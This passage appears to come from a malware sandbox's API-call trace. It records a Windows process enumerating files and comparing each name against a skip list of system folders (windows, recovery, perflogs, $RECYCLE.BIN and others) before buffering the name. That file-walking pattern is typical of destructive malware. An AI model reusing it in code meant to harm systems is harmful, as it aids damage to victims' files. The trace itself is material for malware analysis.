Flags=0x0, Size=0x30) returned 0x22ce70 [0101.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-environment-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 37 [0101.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0101.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0101.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0101.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-environment-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 37 [0101.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0101.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0101.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0101.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.233] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7667bd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7667bd3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7b78b8d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x50c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-filesystem-l1-1-0.dll", cAlternateFileName="AP0479~1.DLL")) returned 1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2=".") returned 1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="..") returned 1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="...") returned 1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="windows") returned -1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="recovery") returned -1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="msocache") returned -1 [0101.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0101.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0101.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-filesystem-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 36 [0101.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0101.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0101.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0101.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-filesystem-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 36 [0101.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0101.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0101.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0101.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.233] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf483611a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf483611a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4a25fae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-heap-l1-1-0.dll", cAlternateFileName="AP23C9~1.DLL")) returned 1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2=".") returned 1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="..") returned 1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="...") returned 1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="windows") returned -1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="recovery") returned -1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.233] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.234] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="msocache") returned -1 [0101.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0101.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0101.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0101.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x2413a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-heap-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0101.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0101.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0101.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0101.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0101.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x240f70, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-heap-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0101.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0101.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0101.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0101.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0101.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0101.234] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4903b8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4903b8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x54ef2e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-locale-l1-1-0.dll", cAlternateFileName="APCB40~1.DLL")) returned 1 [0101.234] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2=".") returned 1 [0101.234] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="..") returned 1 [0101.234] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="...") returned 1 [0101.234] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="windows") returned -1 [0101.234] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="recovery") returned -1 [0101.234] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.234] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.234] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.234] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.234] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="msocache") returned -1 [0101.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0101.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0101.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-locale-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 32 [0101.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0101.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0101.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0101.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-locale-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 32 [0101.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0101.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0101.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0101.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.235] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf63ed72c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf63ed72c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6a7bf80, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x72c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-math-l1-1-0.dll", cAlternateFileName="APAE51~1.DLL")) returned 1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2=".") returned 1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="..") returned 1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="...") returned 1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="windows") returned -1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="recovery") returned -1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="msocache") returned -1 [0101.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0101.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-math-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0101.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0101.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-math-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x241010, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-math-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0101.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0101.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0101.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-math-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0101.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0101.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-math-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x240f48, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-math-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0101.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0101.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0101.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0101.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0101.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0101.235] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6971e7c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6971e7c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6971e7c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x68c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-multibyte-l1-1-0.dll", cAlternateFileName="AP972F~1.DLL")) returned 1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2=".") returned 1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="..") returned 1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="...") returned 1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="windows") returned -1 [0101.235] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="recovery") returned -1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="msocache") returned -1 [0101.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0101.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-multibyte-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 35 [0101.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0101.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0101.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-multibyte-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 35 [0101.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0101.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0101.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0101.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.236] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18d43c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18d43c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18d43c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11ec0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-private-l1-1-0.dll", cAlternateFileName="AP7D9E~1.DLL")) returned 1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2=".") returned 1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="..") returned 1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="...") returned 1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="windows") returned -1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="recovery") returned -1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.236] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.243] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="msocache") returned -1 [0101.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0101.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-private-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0101.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-private-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-private-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0101.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0101.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0101.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-private-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0101.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-private-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-private-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0101.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0101.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0101.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0101.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.244] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefd8e49f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd8e49f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd8e49f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, 